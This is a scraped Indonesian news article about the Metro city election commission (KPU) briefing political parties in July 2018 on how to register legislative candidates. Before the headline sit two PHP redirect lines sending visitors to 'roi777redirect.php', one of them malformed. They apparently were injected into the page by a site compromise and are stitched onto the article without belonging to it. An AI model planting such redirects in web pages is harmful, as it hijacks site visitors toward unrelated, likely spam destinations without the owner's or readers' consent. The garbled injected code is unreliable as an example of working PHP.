header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); KPU Metro Gelar Sosialisasi Pendaftaran Caleg -
KPU Metro Gelar Sosialisasi Pendaftaran Caleg

TRANSLAMPUNG.COM, METRO – KPU Metro menggelar sosialisasi tentang tata cara dan alur proses pemilihan anggota legislatif. Sosialisasi itu diberikan kepada seluruh Parpol di Kota Metro, Kesbangpol Metro, dan warga masyarakat.

“Seluruh pimpinan partai politik se Kota Metro, sama Kesbangpol kita undang. Sosialisasi tersebut intinya membahas tatacara pendaftaran calon yang dimulai tanggal 4 sampai tanggal 17 Juli,” kata Sukatno Selaku ketua KPU Metro.

Menurut Sukatno, persyaratanya sudah diumumkan, hanya sosialisasi kepada pengurus partai politik.

“Maksimal satu partai 100% dari dapil misal kursi 8 maksimal 8 30% perempuan. Dan seluruh parpol dari seluruh dapil bisa mendaftarkan 25 bacaleg,” kata Sukatno.

Agus Riyanto, selaku Komisioner KPU bidang Sosialisasi mengatakan kegiatan dilakukan di Hotel Grand Sekuntum pada, Selasa (3/7) adalah sosialisasi PKPU.

“Sosialisasi PKPU 20/2018 tentang Pencalonan DPR, DPRD Provinsi, DPRD Kabupaten atau Kota di Pemilu 2019,” kata dia.

Dari Parpol PKS ketika diwawancara tidak menemui kendala dalam proses pendaftaran bacaleg ini.

“Dari PKS sejauh ini tidak ada kendala, semuanya sudah sesuai aturan. Tadi masing-masing partai 13. Ada yang tiga orang dua orang masing-masing partai, untuk semua dapil, target masing-masing dapil 1 target 4 seluruh Kota Metro,” tandas Ketua DPD PKS Kota Metro, Selasa (3/8/2018). (suf/hkw)

News Reporter